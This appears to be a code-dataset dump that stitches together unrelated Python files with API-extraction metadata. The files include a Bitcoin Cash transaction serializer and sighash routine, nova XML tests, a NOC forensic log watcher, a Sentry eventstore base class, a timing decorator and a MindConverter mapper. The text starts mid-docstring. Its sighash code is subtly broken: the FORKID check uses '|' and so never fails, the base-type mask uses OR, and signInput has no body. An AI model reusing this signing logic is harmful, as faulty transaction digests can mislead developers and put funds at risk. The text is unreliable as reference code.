All `outputs` elements are dicts with 'value' (int) and 'scriptpubkey' (bytes).
"""
forkid = 0x000000
def __init__(self, version,inputs,outputs,locktime):
self.version = int(version)
self.inputs = inputs
self.outputs = outputs
self.locktime = locktime
self.digest_cache = {}
@classmethod
def from_bytes(cls, raw, error_extra=True):
raw = bytes(raw)
mv = memoryview(raw)
offset = 0
version, offset = read_ule4(mv, offset)
ninputs, offset = read_var_int(mv, offset)
if ninputs*37 > len(raw)-offset: # sanity check in case ninputs is 4 billion
raise struct.error('Number of inputs too large')
inputs = [None]*ninputs
for i in range(ninputs):
ph, offset = read_nbytes(mv, 32, offset)
pn, offset = read_ule4(mv, offset)
scriptlen, offset = read_var_int(mv, offset)
script, offset = read_nbytes(mv, scriptlen, offset)
sequence, offset = read_ule4(mv, offset)
inputs[i] = dict(prevout_hash=ph[::-1], prevout_n = pn, scriptsig=script, sequence=sequence)
noutputs, offset = read_var_int(mv, offset)
if noutputs*5 > len(raw)-offset: # sanity check in case noutputs is 4 billion
raise struct.error('Number of outputs too large')
outputs = [None]*noutputs
for i in range(noutputs):
value, offset = read_ule8(mv, offset)
scriptlen, offset = read_var_int(mv, offset)
script, offset = read_nbytes(mv, scriptlen, offset)
outputs[i] = dict(value=value, scriptpubkey=script)
locktime, offset = read_ule4(mv,offset)
if error_extra and len(mv) > offset:
raise ValueError("extra bytes found after transaction")
self = cls(version,inputs,outputs,locktime)
self.raw = bytes(mv[:offset]) # Save the raw bytes up to this offset.
return self
def to_bytes(self,):
""" Returns byte serialized transaction as appropriate for broadcast.
(note that most broadcasting APIs expect hex)
If scriptsig is missing on any inputs this will fail.
"""
return b''.join(self.serialize_parts())
def digestInput(self, i, nhashtype, scriptcode, double_hashing = True):
"""
Return the 32-byte digest for a given input, in given sighash mode.
You need this to create/verify CHECKSIG signatures.
The specified input (by index `i`) must have a 'prevout_value' entry.
It does *not* need a scriptsig.
nhashtype is an integer 0-255.
This is bitcoin cash so you must include SIGHASH_FORKID.
`scriptcode` needs to be provided. It is defined as the currently
executing script taken from the last OP_CODESEPARATOR, if present.
For P2SH, 'currently executing script' is defined as the redeemscript.
If 'double_hashing' is set to false, just a single SHA256 of the digest is returned.
This might be useful to test for signed transactions using CHECKDATASIG.
Important: The digestInput result generally depends on the other
inputs and outputs, except for special cases of nhashtype. Make sure
you do not call it before you settle these things.
"""
# Following this procedure:
# https://github.com/bitcoincashorg/bitcoincash.org/blob/master/spec/replay-protected-sighash.md
i = int(i)
nhashtype = int(nhashtype)
scriptcode = bytes(scriptcode)
cache = self.digest_cache
cache_id = (i, nhashtype, scriptcode, double_hashing)
try:
return cache[cache_id]
except KeyError:
pass
self.inputs = tuple(self.inputs)
self.outputs = tuple(self.outputs)
inp = self.inputs[i]
try:
value = inp['prevout_value']
except KeyError:
raise ValueError("Missing prevout_value -- cannot digest.", inp)
assert 0 <= nhashtype <= 0xff
if not nhashtype | SIGHASH_FORKID:
raise ValueError("Missing SIGHASH_FORKID. Digest in non-forkid mode not implemented!")
basetype = nhashtype | 0x1f
if nhashtype & SIGHASH_ANYONECANPAY:
hashPrevouts = zero32
hashSequence = zero32
else:
try:
hashPrevouts = cache['hashPrevouts']
except KeyError:
hashPrevouts = cache['hashPrevouts'] = self.hashPrevouts()
if basetype != SIGHASH_NONE and basetype != SIGHASH_SINGLE:
try:
hashSequence = cache['hashSequence']
except KeyError:
hashSequence = cache['hashSequence'] = self.hashSequence()
if basetype != SIGHASH_NONE and basetype != SIGHASH_SINGLE:
try:
hashOutputs = cache['hashOutputs']
except KeyError:
hashOutputs = cache['hashOutputs'] = self.hashOutputs()
elif basetype == SIGHASH_SINGLE and i < len(self.outputs):
hashOutputs = hash256(b''.join(serialize_output(self.outputs[i])))
else:
hashOutputs = zero32
self.digest_parts = [
int_to_ule4(self.version),
hashPrevouts,
hashSequence,
inp['prevout_hash'][::-1],
int_to_ule4(inp['prevout_n']),
var_int(len(scriptcode)),
scriptcode,
int_to_ule8(value),
int_to_ule4(inp['sequence']),
hashOutputs,
int_to_ule4(self.locktime),
int_to_ule4(nhashtype | (self.forkid << 8))]
self.joined_digest_parts = b''.join(self.digest_parts)
digest = [sha256, hash256][double_hashing](self.joined_digest_parts)
cache[cache_id] = digest
return digest
def signInput(self, i, nhashtype, private_key):
""" Signs transaction using the given private key, as appropriate for
using in OP_CHECKSIG.
Returns the ~71 byte DER signature in low S form. This
does not make scriptsig however -- that is up to you!
"""
def hashPrevouts(self,):
flatten = chain.from_iterable
return hash256(b''.join(flatten(
(inp['prevout_hash'][::-1], int_to_ule4(inp['prevout_n'])) for inp in self.inputs
)))
def hashSequence(self,):
return hash256(b''.join(
int_to_ule4(inp['sequence']) for inp in self.inputs)
)
def hashOutputs(self,):
flatten = chain.from_iterable
return hash256(b''.join(flatten(
self.serialize_parts_output(out) for out in self.outputs)))
@staticmethod
def serialize_parts_input(inp):
"""Returns five bytes objects"""
scriptsig = inp['scriptsig']
return (inp['prevout_hash'][::-1],
int_to_ule4(inp['prevout_n']),
var_int(len(scriptsig)),
scriptsig,
int_to_ule4(inp['sequence']),
)
@staticmethod
def serialize_parts_output(out):
"""Returns three bytes objects"""
outscript = out['scriptpubkey']
return (int_to_ule8(out['value']),
var_int(len(outscript)),
outscript
)
def serialize_parts(self,):
"""Like serialize but returns all pieces in tuples."""
flatten = chain.from_iterable
return chain(
(int_to_ule4(self.version), var_int(len(self.inputs)), ),
flatten(self.serialize_parts_input(inp) for inp in self.inputs),
(var_int(len(self.outputs)), ),
flatten(self.serialize_parts_output(out) for out in self.outputs),
(int_to_ule4(self.locktime), ),
)
### Script helpers
def minpush(b):
""" Return minimal push form for bytes `b` in bitcoin script."""
l = len(b)
if l == 0:
return b'\x00'
elif l == 1:
if b[0] == 0x81: # 0x81 is pushed by OP_1NEGATE
return b'\x4f'
elif 0 < b[0] <= 16:
return int_to_ubyte(80 + b[0])
return b'\x01' + b
elif l < 0x4c:
return int_to_ubyte(l) + b
elif l <= 0xff:
return b'\x4c' + int_to_ubyte(l) + b
elif l <= 0xffff:
return b'\x4d' + int_to_ule2(l) + b
else:
return b'\x4e' + int_to_ule4(l) + b
|
[
"struct.Struct",
"hashlib.sha256",
"hashlib.new",
"struct.error"
] |
[((448, 472), 'hashlib.new', 'hashlib.new', (['"""ripemd160"""'], {}), "('ripemd160')\n", (459, 472), False, 'import hashlib\n'), ((816, 834), 'struct.Struct', 'struct.Struct', (['"""B"""'], {}), "('B')\n", (829, 834), False, 'import struct\n'), ((855, 874), 'struct.Struct', 'struct.Struct', (['"""<H"""'], {}), "('<H')\n", (868, 874), False, 'import struct\n'), ((895, 914), 'struct.Struct', 'struct.Struct', (['"""<L"""'], {}), "('<L')\n", (908, 914), False, 'import struct\n'), ((935, 954), 'struct.Struct', 'struct.Struct', (['"""<Q"""'], {}), "('<Q')\n", (948, 954), False, 'import struct\n'), ((1069, 1090), 'struct.Struct', 'struct.Struct', (['format'], {}), '(format)\n', (1082, 1090), False, 'import struct\n'), ((1522, 1551), 'struct.error', 'struct.error', (['"""too few bytes"""'], {}), "('too few bytes')\n", (1534, 1551), False, 'import struct\n'), ((392, 409), 'hashlib.sha256', 'hashlib.sha256', (['b'], {}), '(b)\n', (406, 409), False, 'import hashlib\n'), ((3663, 3705), 'struct.error', 'struct.error', (['"""Number of inputs too large"""'], {}), "('Number of inputs too large')\n", (3675, 3705), False, 'import struct\n'), ((4307, 4350), 'struct.error', 'struct.error', (['"""Number of outputs too large"""'], {}), "('Number of outputs too large')\n", (4319, 4350), False, 'import struct\n')]
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 <NAME>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
from nova.api.openstack import common
from nova.api.openstack import xmlutil
from nova.openstack.common import log as logging
from nova.tests.integrated import integrated_helpers
LOG = logging.getLogger(__name__)
class XmlTests(integrated_helpers._IntegratedTestBase):
""""Some basic XML sanity checks."""
def test_namespace_limits(self):
headers = {}
headers['Accept'] = 'application/xml'
response = self.api.api_request('/limits', headers=headers)
data = response.read()
LOG.debug("data: %s" % data)
root = etree.XML(data)
self.assertEqual(root.nsmap.get(None), xmlutil.XMLNS_COMMON_V10)
def test_namespace_servers(self):
# /servers should have v1.1 namespace (has changed in 1.1).
headers = {}
headers['Accept'] = 'application/xml'
response = self.api.api_request('/servers', headers=headers)
data = response.read()
LOG.debug("data: %s" % data)
root = etree.XML(data)
self.assertEqual(root.nsmap.get(None), common.XML_NS_V11)
|
[
"lxml.etree.XML",
"nova.openstack.common.log.getLogger"
] |
[((878, 905), 'nova.openstack.common.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (895, 905), True, 'from nova.openstack.common import log as logging\n'), ((1262, 1277), 'lxml.etree.XML', 'etree.XML', (['data'], {}), '(data)\n', (1271, 1277), False, 'from lxml import etree\n'), ((1678, 1693), 'lxml.etree.XML', 'etree.XML', (['data'], {}), '(data)\n', (1687, 1693), False, 'from lxml import etree\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from solution import Solution
inpt = "()(())"
sol = Solution()
res = sol.longestValidParentheses(inpt)
print(res)
|
[
"solution.Solution"
] |
[((100, 110), 'solution.Solution', 'Solution', ([], {}), '()\n', (108, 110), False, 'from solution import Solution\n')]
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# forensic
# ----------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
from __future__ import print_function
import sys
import re
from collections import namedtuple
import operator
import time
# Third-party modules
import six
# NOC modules
from noc.core.management.base import BaseCommand
SpanData = namedtuple("SpanData", ["ts", "id", "server", "service", "label"])
class Command(BaseCommand):
rx_open = re.compile(
r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d+) \[noc\.core\.forensic\] "
r"\[>([^\|]+)\|([^\|]+)\|([^\]]+)\]\s*(.*)"
)
rx_close = re.compile(
r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d+) \[noc\.core\.forensic\] " r"\[<([^\]]+)\]"
)
show_mask = "%-23s %-25s %-15s %-30s %s"
show_watch_mask = "%-23s %6s %-25s %-15s %-30s %s"
time_format = "%Y-%m-%d %H:%M:%S"
REFRESH_INTERVAL = 1
def add_arguments(self, parser):
subparsers = parser.add_subparsers(dest="cmd", help="sub-commands help")
# sync
incomplete_parser = subparsers.add_parser("incomplete", help="Show incomplete operations")
incomplete_parser.add_argument("--watch", action="store_true", help="Watch mode")
def handle(self, cmd, *args, **options):
getattr(self, "handle_%s" % cmd)(*args, **options)
def handle_incomplete(self, watch=False, *args, **kwargs):
def show():
self.print(
"\x1b[2J\x1b[1;1H%s Spans: %d/%d" % (time.strftime("%H:%M:%S"), n_closed, n_open)
)
self.print(self.show_mask % ("Timestamp", "ID", "Server", "Service", "Label"))
for s in sorted(six.itervalues(spans), key=operator.attrgetter("ts")):
self.print(self.show_mask % (s.ts, s.id, s.server, s.service, s.label))
if not spans:
self.print(" No spans")
def show_watch():
now = time.time()
self.print(
"\x1b[2J\x1b[1;1H%s Spans: %d/%d" % (time.strftime("%H:%M:%S"), n_closed, n_open)
)
self.print(
self.show_watch_mask % ("Timestamp", "Dur", "ID", "Server", "Service", "Label")
)
for s in sorted(six.itervalues(spans), key=operator.attrgetter("ts")):
ts = time.mktime(time.strptime(s.ts.split(",", 1)[0], self.time_format))
duration = str(int(now - ts))
self.print(
self.show_watch_mask % (s.ts, duration, s.id, s.server, s.service, s.label)
)
if not spans:
self.print(" No spans")
spans = {}
next_show = 0
n_open = 0
n_closed = 0
for line in sys.stdin:
line = line.strip()
if "[noc.core.forensic] [>" in line:
# Open span
match = self.rx_open.search(line)
if match:
s = SpanData(
ts=match.group(1),
id=match.group(2),
server=match.group(3),
service=match.group(4),
label=match.group(5),
)
spans[s.id] = s
n_open += 1
elif "[noc.core.forensic] [<" in line:
# Close span
match = self.rx_close.search(line)
if match:
sid = match.group(2)
if sid in spans:
del spans[sid]
n_closed += 1
elif "[noc.core.forensic] [=Process restarted]" in line:
# Process restarted, clear spans
if not watch:
show()
self.print("===[ Process Restarted ]==============")
# Reset spans
spans = {}
next_show = 0
n_open = 0
n_closed = 0
if watch:
t = time.time()
if t > next_show:
next_show = t + self.REFRESH_INTERVAL
show_watch()
if watch:
show_watch()
else:
show()
if __name__ == "__main__":
Command().run()
|
[
"time.strftime",
"time.time",
"operator.attrgetter",
"six.itervalues",
"collections.namedtuple",
"re.compile"
] |
[((572, 638), 'collections.namedtuple', 'namedtuple', (['"""SpanData"""', "['ts', 'id', 'server', 'service', 'label']"], {}), "('SpanData', ['ts', 'id', 'server', 'service', 'label'])\n", (582, 638), False, 'from collections import namedtuple\n'), ((683, 832), 're.compile', 're.compile', (['"""(\\\\d{4}-\\\\d{2}-\\\\d{2} \\\\d{2}:\\\\d{2}:\\\\d{2},\\\\d+) \\\\[noc\\\\.core\\\\.forensic\\\\] \\\\[>([^\\\\|]+)\\\\|([^\\\\|]+)\\\\|([^\\\\]]+)\\\\]\\\\s*(.*)"""'], {}), "(\n '(\\\\d{4}-\\\\d{2}-\\\\d{2} \\\\d{2}:\\\\d{2}:\\\\d{2},\\\\d+) \\\\[noc\\\\.core\\\\.forensic\\\\] \\\\[>([^\\\\|]+)\\\\|([^\\\\|]+)\\\\|([^\\\\]]+)\\\\]\\\\s*(.*)'\n )\n", (693, 832), False, 'import re\n'), ((846, 963), 're.compile', 're.compile', (['"""(\\\\d{4}-\\\\d{2}-\\\\d{2} \\\\d{2}:\\\\d{2}:\\\\d{2},\\\\d+) \\\\[noc\\\\.core\\\\.forensic\\\\] \\\\[<([^\\\\]]+)\\\\]"""'], {}), "(\n '(\\\\d{4}-\\\\d{2}-\\\\d{2} \\\\d{2}:\\\\d{2}:\\\\d{2},\\\\d+) \\\\[noc\\\\.core\\\\.forensic\\\\] \\\\[<([^\\\\]]+)\\\\]'\n )\n", (856, 963), False, 'import re\n'), ((2145, 2156), 'time.time', 'time.time', ([], {}), '()\n', (2154, 2156), False, 'import time\n'), ((1890, 1911), 'six.itervalues', 'six.itervalues', (['spans'], {}), '(spans)\n', (1904, 1911), False, 'import six\n'), ((2455, 2476), 'six.itervalues', 'six.itervalues', (['spans'], {}), '(spans)\n', (2469, 2476), False, 'import six\n'), ((4248, 4259), 'time.time', 'time.time', ([], {}), '()\n', (4257, 4259), False, 'import time\n'), ((1917, 1942), 'operator.attrgetter', 'operator.attrgetter', (['"""ts"""'], {}), "('ts')\n", (1936, 1942), False, 'import operator\n'), ((2482, 2507), 'operator.attrgetter', 'operator.attrgetter', (['"""ts"""'], {}), "('ts')\n", (2501, 2507), False, 'import operator\n'), ((1712, 1737), 'time.strftime', 'time.strftime', (['"""%H:%M:%S"""'], {}), "('%H:%M:%S')\n", (1725, 1737), False, 'import time\n'), ((2234, 2259), 'time.strftime', 'time.strftime', (['"""%H:%M:%S"""'], {}), "('%H:%M:%S')\n", (2247, 2259), False, 'import time\n')]
|
from __future__ import absolute_import
from copy import deepcopy
import sentry_sdk
from sentry import nodestore
from sentry.snuba.events import Columns
from sentry.utils.services import Service
from .models import Event
class Filter(object):
"""
A set of conditions, start/end times and project, group and event ID sets
used to restrict the results of a Snuba query.
start (DateTime): Start datetime - default None
end (DateTime): Start datetime - default None
conditions (Sequence[Sequence[str, str, Any]]): List of conditions to fetch - default None
having (Sequence[str, str, Any]]): List of having conditions to filter by - default None
project_ids (Sequence[int]): List of project IDs to fetch - default None
group_ids (Sequence[int]): List of group IDs to fetch - default None
event_ids (Sequence[int]): List of event IDs to fetch - default None
selected_columns (Sequence[str]): List of columns to select
aggregations (Sequence[Any, str|None, str]): Aggregate functions to fetch.
groupby (Sequence[str]): List of columns to group results by
"""
def __init__(
self,
start=None,
end=None,
conditions=None,
having=None,
project_ids=None,
group_ids=None,
event_ids=None,
selected_columns=None,
aggregations=None,
rollup=None,
groupby=None,
orderby=None,
):
self.start = start
self.end = end
self.conditions = conditions
self.having = having
self.project_ids = project_ids
self.group_ids = group_ids
self.event_ids = event_ids
self.rollup = rollup
self.selected_columns = selected_columns if selected_columns is not None else []
self.aggregations = aggregations if aggregations is not None else []
self.groupby = groupby
self.orderby = orderby
@property
def filter_keys(self):
"""
Get filter_keys value required for raw snuba query
"""
filter_keys = {}
if self.project_ids:
filter_keys["project_id"] = self.project_ids
if self.group_ids:
filter_keys["group_id"] = self.group_ids
if self.event_ids:
filter_keys["event_id"] = self.event_ids
return filter_keys
@property
def date_params(self):
"""
Get the datetime parameters as a dictionary
"""
return {"start": self.start, "end": self.end}
def update_with(self, updates):
keys = ("selected_columns", "aggregations", "conditions", "orderby", "groupby")
for key in keys:
if key in updates:
setattr(self, key, updates[key])
def clone(self):
return deepcopy(self)
class EventStorage(Service):
__all__ = (
"minimal_columns",
"create_event",
"get_event_by_id",
"get_events",
"get_unfetched_events",
"get_prev_event_id",
"get_next_event_id",
"get_earliest_event_id",
"get_latest_event_id",
"bind_nodes",
)
# The minimal list of columns we need to get from snuba to bootstrap an
# event. If the client is planning on loading the entire event body from
# nodestore anyway, we may as well only fetch the minimum from snuba to
# avoid duplicated work.
minimal_columns = [Columns.EVENT_ID, Columns.GROUP_ID, Columns.PROJECT_ID, Columns.TIMESTAMP]
def get_events(
self,
snuba_filter,
orderby=None,
limit=100,
offset=0,
referrer="eventstore.get_events", # NOQA
):
"""
Fetches a list of events given a set of criteria.
Arguments:
snuba_filter (Filter): Filter
orderby (Sequence[str]): List of fields to order by - default ['-time', '-event_id']
limit (int): Query limit - default 100
offset (int): Query offset - default 0
referrer (string): Referrer - default "eventstore.get_events"
"""
raise NotImplementedError
def get_unfetched_events(
self,
snuba_filter,
orderby=None,
limit=100,
offset=0,
referrer="eventstore.get_unfetched_events", # NOQA
):
"""
Same as get_events but returns events without their node datas loaded.
Only the event ID, projectID, groupID and timestamp field will be present without
an additional fetch to nodestore.
Used for fetching large volumes of events that do not need data loaded
from nodestore. Currently this is just used for event data deletions where
we just need the event IDs in order to process the deletions.
Arguments:
snuba_filter (Filter): Filter
orderby (Sequence[str]): List of fields to order by - default ['-time', '-event_id']
limit (int): Query limit - default 100
offset (int): Query offset - default 0
referrer (string): Referrer - default "eventstore.get_unfetched_events"
"""
raise NotImplementedError
def get_event_by_id(self, project_id, event_id):
"""
Gets a single event given a project_id and event_id.
Arguments:
project_id (int): Project ID
event_id (str): Event ID
"""
raise NotImplementedError
def get_next_event_id(self, event, snuba_filter): # NOQA
"""
Gets the next event given a current event and some conditions/filters.
Returns a tuple of (project_id, event_id)
Arguments:
event (Event): Event object
snuba_filter (Filter): Filter
"""
raise NotImplementedError
def get_prev_event_id(self, event, snuba_filter): # NOQA
"""
Gets the previous event given a current event and some conditions/filters.
Returns a tuple of (project_id, event_id)
Arguments:
event (Event): Event object
snuba_filter (Filter): Filter
"""
raise NotImplementedError
def get_earliest_event_id(self, event, snuba_filter): # NOQA
"""
Gets the earliest event given a current event and some conditions/filters.
Returns a tuple of (project_id, event_id)
Arguments:
event (Event): Event object
snuba_filter (Filter): Filter
"""
raise NotImplementedError
def get_latest_event_id(self, event, snuba_filter): # NOQA
"""
Gets the latest event given a current event and some conditions/filters.
Returns a tuple of (project_id, event_id)
Arguments:
event (Event): Event object
snuba_filter (Filter): Filter
"""
raise NotImplementedError
def create_event(self, project_id=None, event_id=None, group_id=None, data=None):
"""
Returns an Event from processed data
"""
return Event(project_id=project_id, event_id=event_id, group_id=group_id, data=data)
def bind_nodes(self, object_list, node_name="data"):
"""
For a list of Event objects, and a property name where we might find an
(unfetched) NodeData on those objects, fetch all the data blobs for
those NodeDatas with a single multi-get command to nodestore, and bind
the returned blobs to the NodeDatas.
It's not necessary to bind a single Event object since data will be lazily
fetched on any attempt to access a property.
"""
with sentry_sdk.start_span(op="eventstore.base.bind_nodes"):
object_node_list = [
(i, getattr(i, node_name)) for i in object_list if getattr(i, node_name).id
]
# Remove duplicates from the list of nodes to be fetched
node_ids = list({n.id for _, n in object_node_list})
if not node_ids:
return
node_results = nodestore.get_multi(node_ids)
for item, node in object_node_list:
data = node_results.get(node.id) or {}
node.bind_data(data, ref=node.get_ref(item))
|
[
"sentry_sdk.start_span",
"copy.deepcopy",
"sentry.nodestore.get_multi"
] |
[((2786, 2800), 'copy.deepcopy', 'deepcopy', (['self'], {}), '(self)\n', (2794, 2800), False, 'from copy import deepcopy\n'), ((7527, 7581), 'sentry_sdk.start_span', 'sentry_sdk.start_span', ([], {'op': '"""eventstore.base.bind_nodes"""'}), "(op='eventstore.base.bind_nodes')\n", (7548, 7581), False, 'import sentry_sdk\n'), ((7937, 7966), 'sentry.nodestore.get_multi', 'nodestore.get_multi', (['node_ids'], {}), '(node_ids)\n', (7956, 7966), False, 'from sentry import nodestore\n')]
|
"""This is a decorator to show the time cost by the function"""
from functools import wraps
from time import time
def count_time(func):
"""print run time calculation"""
@wraps(func)
def count(*args, **kwargs):
"""record the time of both start and end,
print the cost time after finishing the function"""
time_start = time()
res = func(*args, **kwargs)
time_end = time()
print("\nThe time cost is : {:.3f}ms".format((time_end - time_start) * 1000))
return res
return count
|
[
"functools.wraps",
"time.time"
] |
[((181, 192), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (186, 192), False, 'from functools import wraps\n'), ((356, 362), 'time.time', 'time', ([], {}), '()\n', (360, 362), False, 'from time import time\n'), ((418, 424), 'time.time', 'time', ([], {}), '()\n', (422, 424), False, 'from time import time\n')]
|
# Copyright 2021 Huawei Technologies Co., Ltd.All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Mapper module."""
from mindconverter.graph_based_converter.common.utils import reset_template_and_exchange_msg
from mindconverter.graph_based_converter.constant import WeightType
from mindconverter.graph_based_converter.mapper.base import AtenToMindSporeMapper
class BroadcastToMapper(AtenToMindSporeMapper):
"""BroadcastTo mapper."""
@staticmethod
def _operation_name_in_ms(*args, **kwargs):
return "broadcast_to"
@staticmethod
def _convert_trained_weights(**kwargs):
weights = kwargs.get("weights", list())
args_name = ["input", "shape", "implicit"]
args_name_list = BroadcastToMapper.get_args_name_list(**kwargs, args_name=args_name)
trainable_params = dict()
for weight in weights:
trainable_params[args_name_list[weight.location]] = {"data": weight.value, "location": weight.location,
"type": WeightType.PARAMETER.value,
"onnx_name": weight.name}
return trainable_params
@staticmethod
def _generate_snippet_template(**kwargs):
template, exchange_msg, outputs_list, outputs_mapping = AtenToMindSporeMapper._generate_snippet_template(
**kwargs)
raw_params = kwargs.get("raw_params")
if not raw_params:
return template, exchange_msg, outputs_list, outputs_mapping
op = kwargs.get("operation")
trainable_params = kwargs.get("trainable_params", dict())
output_shape = raw_params.get("output_shape", tuple())
variable_slot = "var_0"
args_name = ["input", "shape", "implicit"]
inputs, args, group_inputs = BroadcastToMapper._params_parser(raw_params=raw_params,
args_name=args_name,
trainable_params=trainable_params)
args = BroadcastToMapper._get_args(variable_slot=variable_slot, inputs=inputs, args=args,
output_shape=output_shape)
init_template_list = [f"self.{{{variable_slot}}}_{arg_name} = {{{arg_name}}}" for arg_name in args]
parameters_declared = dict()
for name, trainable_param in trainable_params.copy().items():
value = trainable_param["data"]
if BroadcastToMapper.is_tensor(value):
variable_slot_param_name = f"{variable_slot}/{name}"
init_template_list.append(f"self.{{{variable_slot}}}_{name} = {{{variable_slot_param_name}}}")
parameters_declared[name] = ""
else:
args[name] = value.tolist()
init_template_list.append(f"self.{{{variable_slot}}}_{name} = {{{name}}}")
trainable_params.pop(name)
construct_template = f"opt_{{{variable_slot}}} = ms_np.{op}({inputs[0]}, ({', '.join(inputs[1:-1])}))"
template, exchange_msg = reset_template_and_exchange_msg(template, exchange_msg, variable_slot,
init_template_list, [construct_template], args,
trainable_params, parameters_declared, group_inputs)
return template, exchange_msg, outputs_list, outputs_mapping
@staticmethod
def _get_args(**kwargs):
"""Get args from params_parser."""
variable_slot = kwargs.get("variable_slot")
inputs = kwargs.get("inputs", list())
args = kwargs.get("args", dict())
output_shape = kwargs.get("output_shape", tuple())
shape_name_list = [ipt.replace(f"self.{{{variable_slot}}}_", "") for ipt in inputs[1:-1]]
for idx, shape_name in enumerate(shape_name_list):
if isinstance(args.get(shape_name), int) and args.get(shape_name) == -1:
args[shape_name] = output_shape[idx]
args.pop("implicit")
return args
|
[
"mindconverter.graph_based_converter.mapper.base.AtenToMindSporeMapper._generate_snippet_template",
"mindconverter.graph_based_converter.common.utils.reset_template_and_exchange_msg"
] |
[((1924, 1982), 'mindconverter.graph_based_converter.mapper.base.AtenToMindSporeMapper._generate_snippet_template', 'AtenToMindSporeMapper._generate_snippet_template', ([], {}), '(**kwargs)\n', (1972, 1982), False, 'from mindconverter.graph_based_converter.mapper.base import AtenToMindSporeMapper\n'), ((3729, 3908), 'mindconverter.graph_based_converter.common.utils.reset_template_and_exchange_msg', 'reset_template_and_exchange_msg', (['template', 'exchange_msg', 'variable_slot', 'init_template_list', '[construct_template]', 'args', 'trainable_params', 'parameters_declared', 'group_inputs'], {}), '(template, exchange_msg, variable_slot,\n init_template_list, [construct_template], args, trainable_params,\n parameters_declared, group_inputs)\n', (3760, 3908), False, 'from mindconverter.graph_based_converter.common.utils import reset_template_and_exchange_msg\n')]
|